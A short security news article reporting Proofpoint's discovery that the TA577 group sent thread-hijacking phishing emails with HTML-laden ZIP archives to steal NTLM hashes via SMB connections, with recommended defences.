TA577 Changes Tactics: NTLM Hashes Now Targeted

by ·

The cybersecurity firm Proofpoint has discovered that the group known as TA577 has altered the tactics of its cyber attacks. Presently, hackers are deploying phishing emails aimed at pilfering NT LAN Manager (NTLM) authentication hashes, thereby facilitating account takeovers.

Specifically, during two waves of attacks on the 26th and 27th of February 2024, the group dispatched thousands of emails to hundreds of organizations worldwide with the intent to steal employees’ NTLM hashes.

NTLM hashes are utilized within Windows for authentication and session security. Malefactors can exploit the stolen hashes to crack passwords or execute “Pass-the-Hash” attacks, which permit authentication on remote servers without the need to decrypt the passwords.

Observed packet capture (PCAP) from the TA577 campaign

The attack method involves sending phishing emails that appear as responses to previous messages from the victims—a technique known as thread hijacking. These emails contain unique ZIP archives for each victim, which house HTML files. These files use the META refresh meta-tag to trigger automatic connections to a text file on an SMB server. This technique enables cybercriminals to pilfer NTLM hashes when a Windows device attempts to connect to the server.

Proofpoint emphasizes that the attackers delivered the malicious archives to circumvent protections of email clients updated after July 2023. It is noted that the objective of these attacks is specifically the capture of NTLM hashes, rather than the distribution of malware.

Experts note that for the stolen hashes to be utilized in network attacks, multi-factor authentication (MFA) must be disabled on the accounts. It is also suggested that the theft of hashes could serve as a form of reconnaissance to identify valuable targets.

Among the recommended protective measures are configuring email filtering to block messages containing archives with HTML files and setting up firewall configurations to block outgoing SMB connections (typically ports 445 and 139). For Windows 11 users, Microsoft has introduced an additional security feature to thwart NTLM-based attacks over SMB.

Tags: